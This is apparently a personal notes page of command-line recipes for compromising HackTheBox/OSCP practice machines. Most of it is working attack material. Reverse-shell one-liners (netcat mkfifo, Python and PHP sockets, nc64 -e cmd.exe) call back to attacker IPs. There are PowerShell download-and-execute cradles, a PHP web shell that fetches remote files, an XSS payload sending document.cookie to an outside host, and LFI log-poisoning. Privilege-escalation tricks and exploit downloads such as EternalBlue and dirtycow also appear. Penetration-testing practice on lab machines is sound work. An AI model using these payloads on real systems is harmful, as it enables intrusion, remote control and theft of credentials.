Machines Practice

Search…
Machines Practice
Follow this medium series for OSCP based Hackthebox machines writeups without MSF by Rana :)
​https://medium.com/@ranakhalil101/ 
Swagshop
one way to get root file
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
2nd way
ww[email protected]:/home/haris$ sudo /usr/bin/vi /var/www/html/a :set shell=/bin/sh :shell
3rd way
sudo vi /var/www/html/a -c ':!/bin/sh'
python magento_rce.py 'http://10.10.10.140/index.php/admin' "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.14 9001 >/tmp/f"
=============================================================
Arkham
nmap -n -v -Pn -p80,135,139,445,8080,49666,49667 -A --reason -oN nmap.txt 10.10.10.130
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.130 --rate=700
smbmap -H 10.10.10.130 -u guest -R | tee smbmap.txt
mount -t cifs -o rw,username=guest,uid=0,gid=0 //10.10.10.130/BatShare 
================================================================
Bastion
mount -t cifs //10.10.10.134/backups /mnt -o user=,password=
find /mnt/ -type f
guestmount --add /mnt/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt2
​
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
java -jar decipher_mremoteng.jar OuhzIwEZtD30y9QFzUOGDDoHnaSWGQFHcD5YSnj/YoJ2sE41GLoykzMgEAZh940z8pKetHSQDonI5/z7
05/10/2019
Bashed:
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > exploit.py
/dev/shm - writable directory
sudo -u scriptmanager bash
upload reverse shell if normal shell not working 
python -c 'import pty;pty.spawn("/bin/bash")'
/usr/share/laudanum/php/php-reverse-shell.php
====================================================================
Nibbles:
hydra -l admin -P rockyou.txt http://ip http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect Username" - not working ip block
cmd.php
GIF8;
find . | grep controllers
ldd --version - cat /etc/lsb-release
One solution to get root 
Create one file monitor.sh 
/bin/sh
bash
Other trick to get exploit for ubuntu version --------- Rational love exploit
​https://www.exploit-db.com/exploits/43775​
===================================================
Blue - window machine
Eternal blue : ms 17-010
nmap -p 445 --script safe -Pn -n ip [nmap -p 445 --script "vuln and safe" -Pn -n ip]
Eternal blue exploit manually :https://www.exploit-db.com/download/42030 https://www.exploit-db.com/exploits/42315​
modify the python exploit and put location in our payload 
Exploit modification required
add computer name in to host file and then scan smb servers
smbclient -L \10.10.10.40 -N 
smbclient \\haris-pc\Users
python exploit.py ip ntsvcs
===========================================================================
Sense - Linux Machine - PFsense
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection
Exploit Database
manual cmd injection
/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port
/status_rrd_graph_img.php?database=queues;whoami|nc+ip+port|python
on attacker machine run this command
nc -vnlp port < cmd
In cmd we have this reverse shell code
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.10",3456)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
nc -lvnp 3456
exploit-db exploit
pfSense 2.3.1_1 - Command Execution
Exploit Database
=====================================================
Optimum
port 80 is opening httpfileserver
tcpdump -i tun0 %00{.exec|ping 10.10.14.10.}
use invoke-powershelltcp.ps1
C:\Windows\SysWow64 - 32 bit windows C:\Windows\system32 - 32 bit windows C:\Windows\Sysnative - 64 bit
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.10 
ctrl shift u - to decode 
C:\Windows\Sysnative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://ip:port/InvokePowerhsleltcp.ps1').}
sherlock script execute to get the false positive patches
New-Object Net.WebClient}.downloadString('http://ip:port/InvokePowerhsleltcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 1234 
New-Object Net.WebClient}.downloadString('http://10.10.14.10:8000/Sherlock.ps1')
Find-AllVulns
cd /poweshell/Empire/data/module_source/privesc/Invoke-MS16032
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8000/Invoke-MS16032.ps1')
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.10:8000/shell.ps1')"
====================================================
Node - Linux
3000- node
sed 's/,/\n/g' notes  - password extract 
api/users
crack the hashes online and offline
Hashes crack with hashcat and john hashcat -a0 -m 1400 dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af /usr/share/dict/rockyou.txt john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt cat /home/alamot/.john/john.pot
online - hashes.org
grep -Ri password . | less
fcrackzip for zip files password cracker fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip 
download file with wget ; wget --header "Cookie: connect.sid=s%3AuGlwY_gicWrNb2ESIiDzUPn9TTi-Dstj.5E1wGaKmQ7QgeS%2BC5%2FfZ3mjy8DCwSdySPOv4rRvvZfU" http://10.10.10.58:3000/api/admin/backup​
base64 -d myplace.backup >myplace
https://mongodb://mark:[email protected]:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
mongodb
privsec to tom user 
mongo -u 'mark' -p '5AYRft73VtFpc84k' scheduler
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
db.tasks.insert( { "cmd": "/bin/cp /bin/bash /tmp/tombash; chmod u+s /tmp/tombash;" } );
find / -perm -4000 2>/dev/null
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 "asd /bin/bash asd"
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 r??t/roo?.txt
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d 0230167104d474 root
using wildcard /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /rt/rt.txt | base64 -d > root.zip
command injection:
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'aaa\n/bin/sh\nls')"
=====================================================
Legacy - windows
Samba Scan
nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.10.10.4
First Exploit - ms08-67
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python ms08-067.py 10.10.10.4 6 445
​
​
wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.14_443.exe
python send_and_execute.py 10.10.10.4 rev_10.10.14.14_443.exe
host file with smbserver
smbserver.py a /usr/share/windows-binaries/
\\10.10.14.14\a\whoami.exe
===========================================================
Valentine
heartbleed vulnerability
python heartbleed.py -n 100 ip
for i in ${seq 0 100}; do python heartbleed.py ip; done
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py​
then find hype.key (hex to ascii)
ssh key and use this key and password get from heartbleed 
ssh -i hype.key [email protected]
check the history and check ps elf | grep root
2nd exploit
https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
su -
==============================================
Fuzzy web app challenge‌
gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌
gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm‌
wfuzz --hh=24 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test​‌
wfuzz --hh=27 -c -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ​‌
====================================== HDC HackTheBox Web Challenge Walkthrough/Solution‌
so the doProcess() function submits the form data to the jquery, Then i had a look at jquery-3.2.1.js CTRL+F and searched for the doProcess()‌
credentials stored in js file doprocess function‌
find emails on secret folder then run bruteforce in to all emails and get the flag‌
=======================================‌
Lernaean Web Challenge — HackTheBox‌
hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "/:password=^PASS^:Invalid Password!" -s 53593‌
========================================= CARTOGRAPHER‌
username= ’- and password= ‘ - sql injection‌
info=flag
‌
[20 Points] Lernaean [by Arrexel]‌
hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form "/:password=^PASS^:Invalid password!" -s 35414‌
=========================================== [50 Points]‌
I know Mag1k [by rkmylo]‌
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4"‌
padbuster http://docker.hackthebox.eu:34849/profile.php 0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D 8 --cookie "iknowmag1k=0lmHd9%2FcTX0Vak4CqgLiavL0Ard%2BFF471QQ5LvkQleBTfmVLxJsvRA%3D%3D;PHPSESSID=h8pl413ekrj16ni133irv92nv4" -plaintext "{\"user\":\"qq\",\"role\":\"admin\"}"
​
=======================================================
Bastard - windows
Drupal payload chnages 
$url = 'http://10.10.10.9/'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $phpcode = <<<'EOD' <?php if (isset($_REQUEST['fuplaod'])) { file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.14.10:8000/" . $REQUEST['fupload'])); }; if (isset($_REQUEST['fexec'])) {
 echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
}; ?> EOD; $file = [ 'filename' => 'sam.php', 'data' => $ippsec ];
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10:8080/chimichurri.exe')
\\10.10.14.10\sam\ms15-051x64.exe "\10.10.14.10\sam\nc64.exe -e cmd.exe 10.10.14.10 443" [#] ms15-051 fixed by zcgonvh powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/Invoke-PowerShellTcp.ps1')
\10.10.14.10\a\ms15-051x64.exe "\10.10.14.10\a\nc64.exe -e cmd.exe 10.10.14.10 443"
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10:8000/mv.ps1')
curl http://10.10.10.9/0xdf.php?cmd=whoami
http://10.10.10.9/0xdf.php?cmd=\\10.10.14.14\share\nc64.exe%20-e%20cmd.exe%2010.10.14.14%20443
​
powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')
Shell with Nishang
python drupalgeddon3.py http://10.10.10.9/ "SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs" 1 "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/shell.ps1')"
windows-kernel-exploits/MS15-051-KB3045171.zip at master · SecWiki/windows-kernel-exploits
GitHub
​
\\10.10.14.14\share\ms15-051x64.exe "whoami"
\\10.10.14.14\share\ms15-051x64.exe "\\10.10.14.14\share\nc64.exe -e cmd.exe 10.10.14.14 443"
===================================================
Poison
​http://10.10.10.84/browse.php?file=listfiles.php - machine is vulnerable to lfi
add this shell in to user agent 
User-Agent: 0xdf: <?php system($_GET['c']); ?>
then check the logs  &c=id
connectivity check
​
view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.14.6
tcpdump -i tun0 icmp
​
view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=nc 10.10.14.6 8081
nc -lnvp 8081
Shell as WWW
 Visit view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.6%209001%20%3E/tmp/f,
Listening on localhost:
 netstat -an -p tcp
 ps -auwwx | grep vnc
Tunneling / VNC connection
tail /etc/proxychains.conf
ssh [email protected] -D 8081
proxychains vncviewer 127.0.0.1:5901 -passwd secret
 Looking inside /root/.vnc/, there’s a passwd file that matches the file secret:
python /opt/vncpasswd.py/vncpasswd.py -d -f secret
LFi Filter :- php://filter/convert.base64-encode/resource=index.php
Request to add data in php variable which is visible on phpinfo.
Content-Type: multipart/form-data; boundary=--PleaseSubscribe
Content-Length: 166 ----PleaseSubscribe
Content-Disposition: form-data; name="sam"; filename="Leaveacomment"
Content-type:text/plain
Please share my videos
====================================================
Brainfuck:
python sshng2john.py id_rsa > braingfuck-crack
john brainfuck-crack --wordlist=/usr/share/wordlis ts/rockyou.txt
wpscan –url https://brainfuck.htb –disable-tls-checks
cp /usr/share/exploitdb/exploits/php/webapps/40939.txt .
wordpress exploit -> smtp cred -> smtp cred to get secret forum password - >  Encryption decryption
Vigenere Ciphers
ssh2john id_rsa > id_john
john id_john –wordlist=/usr/share/wordlists/rockyou.txt
In orestis home directory there are a few files debug.txt, encrypt.sage and output.txt After some google searching, it turns out to be RSA encryption. RSA encryption relies on three prime numbers P, Q, E (two small and one large)https://crypto.stackexchange.com/questions/19444/rsa-given-q-p-and-e
python -c “print format(24604052029401386049980296953784287079059245867880966944246662849341507003750, ‘x’).decode(‘hex’)” 6efc1a5dbb8904751ce6566a305bb8ef
​​
​=================================================
grandparents (granny & grandpa
granny & grandpa
iptables -A OUTPUT -d 10.10.10.14 -j DROP
davtest --url http://10.10.10.15​
move options check move ippsec.html destination ippsec.aspx
ms14-070 exploit work for root ms15-051 - not work
curl -X PUT http://10.10.10.15/shell.txt --data -binary @shell.aspx curl -X MOVE -H 'Destination: http://10.10.10.1 5/shell.aspx' http://10.10.10.15/shell.txt​
curl http://10.10.10.15/shell.aspx​
Reverse shell on metasploit
check 3 exploits for privilege escalation : ms16-016 ms15-051 ms14-058 - working fine msf5 exploit(windows/local/ms14_058_track_popup_menu)
post(multi/recon/local_exploit_suggester)
Microsoft IIS WebDav ‘ScStoragePathFromUrl’ Remote Buffer Overflow
grandpa:
 . Use exploit/windows/iis/iis_webdav_scstoragepathfromurl. As we can see below, set options.
<< use exploit/windows/iis/iis_webdav_scstoragepathfromurl>>
<< options >>
<< set RHOST 10.10.10.14>>
<<set LHOST <attacking machine ip> >>
<<set LPORT 1234>>
 << use exploits/windows/local/ms15_051_client_copy_image >>
<< options >>
============================================
Redcross
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
gobuster -k -u https://intra.redcross.htb/documentation -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html,pdf -t 20
​
Xss payload in to contact us form
<script>new Image().src="http://10.10.14.14:8888/cookie.php?c="+document.cookie;</script>

SQLi
 On submitting the UserID filter, I’m sent to https://intra.redcross.htb/?o=1&page=app, where o= is the id filtered on. If I try with a ' in there, https://intra.redcross.htb/?o=1'&page=app:
 sqlmap -r app.request --delay=1 --batch --dump
 sqlmap -r login.req --risk=3 -p o --dbms=mysql --random-agent --delay=1.0 --technique=UE -T users --dbs
nmap -p- --min-rate 5000 10.10.10.113
python 41162.py -c "ping -c 1 10.10.14.14" -t [email protected] -m 10.10.10.113
tcpdump -i tun0 -n icmp
python 41162.py -c "php -r '\$sock=fsockopen(\"10.10.14.14\",443);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" -t [email protected] -m 10.10.10.113
Injection RCE
Haraka < 2.8.9 - Remote Command Execution
Exploit Database
Brup Suite RCE :
ip=1;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.23",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&action=deny
Priv esc to penelope
s = smtplib.SMTP(mailserver,1025)
./h.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.23\",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t [email protected] -f [email protected] -m redcross
Priv esc to root
[email protected]:/etc$ psql -h 127.0.0.1 -U unixnss -W unix
openssl passwd -1 0xdf
insert into passwd_table (username, passwd, gid, homedir) values ('penel0xdf', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 1000, '/home/penelope');
Path 1: sudoers Group
insert into passwd_table (username, passwd, gid, homedir) values ('sud0xdfer', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 27, '/home/penelope');
sudo su
Path 2: Via unixnssroot
unix=> insert into passwd_table (username, passwd, gid, homedir) values ('ro0xdft', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, '/root');
Find psql Configs
ls -l nss-pgsql*
cat nss-pgsql-root.conf 
psql -h 127.0.0.1 -U unixnssroot -p 5432 -d unix
This user can add a user with user id 0 (root):
insert into passwd_table (username, passwd, uid, gid, homedir) values ('r0xdfot', '$1$wV7CPbj9$59kAklYgquXe5TuJYIT591', 0, 0, '/root');
su r0xdfot
Using this account, we are able to create a new user with UID 0:
insert into passwd_table (username, passwd, uid,gid, homedir) values ('snowscan_root','$6$oTkOZvS...',0,0,'/root');
OSCP/ Vulnhub Practice learning
My Practice on HTB Windows boxes
Last modified 2yr ago
Copy link
On this page
Swagshop
Arkham
Bastion
Bashed:
Nibbles:
Blue - window machine
Sense - Linux Machine - PFsense
Optimum
Node - Linux
Legacy - windows
Valentine
Bastard - windows